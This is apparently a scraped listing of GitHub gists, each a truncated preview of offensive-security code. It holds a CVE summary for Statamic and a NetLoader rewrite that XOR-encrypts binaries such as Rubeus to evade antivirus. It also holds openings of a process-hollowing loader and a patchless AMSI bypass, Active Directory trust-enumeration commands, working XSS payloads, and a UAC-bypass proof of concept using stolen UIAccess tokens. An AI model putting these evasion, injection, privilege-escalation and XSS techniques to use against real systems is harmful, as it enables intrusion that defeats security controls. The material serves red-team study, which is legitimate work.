This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CVE-2017-11422 | |
> [Description] | |
> Statamic framework version 2.5.11 and previous versions does not | |
> correctly check a session's permissions when the methods from a user's | |
> class are called. Problematic methods include reset password, create | |
> new account, create new role, etc. | |
> | |
> [Vulnerability Type] | |
> Incorrect Access Control |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Author: Arno0x0x, Twitter: @Arno0x0x | |
Completely based on @Flangvik netloader | |
This partial rewrite of @Flangvik Netloader includes the following changes: | |
- Allow loading of an XOR encrypted binary to bypass antiviruses | |
To encrypt the initial binary you can use my Python transformFile.py script. | |
Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Author: Arno0x0x, Twitter: @Arno0x0x | |
Completely based on @Flangvik netloader | |
This partial rewrite of @Flangvik Netloader includes the following changes: | |
- Allow loading of an XOR encrypted binary to bypass antiviruses | |
To encrypt the initial binary you can use my Python transformFile.py script. | |
Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Collections.Generic; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
namespace Hollowing | |
{ | |
public class Loader | |
{ | |
public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
Grab Forest Trusts. | |
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#ifndef PATCHLESS_AMSI_H | |
#define PATCHLESS_AMSI_H | |
#include <windows.h> | |
static const int AMSI_RESULT_CLEAN = 0; | |
PVOID g_amsiScanBufferPtr = nullptr; | |
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
" onfocus="alert(1)" name="bounty | |
(Append #bounty to the URL and enjoy your zero interaction XSS ) | |
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// | |
# Internet Explorer, Edge | |
<svg><script>alert(1)<p> | |
# Firefox |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
TaskManagerSecret | |
Author: @splinter_code | |
This is a very ugly POC for a very unreliable UAC bypass through some UI hacks. | |
The core of this hack is stealing and using a token containing the UIAccess flag set. | |
A trick described by James Forshaw, so all credits to him --> https://www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html | |
From there it uses a task manager "feature" to run a new High IL cmd.exe. | |
This has been developed only for fun and shouldn't be used due to its high unreliability. |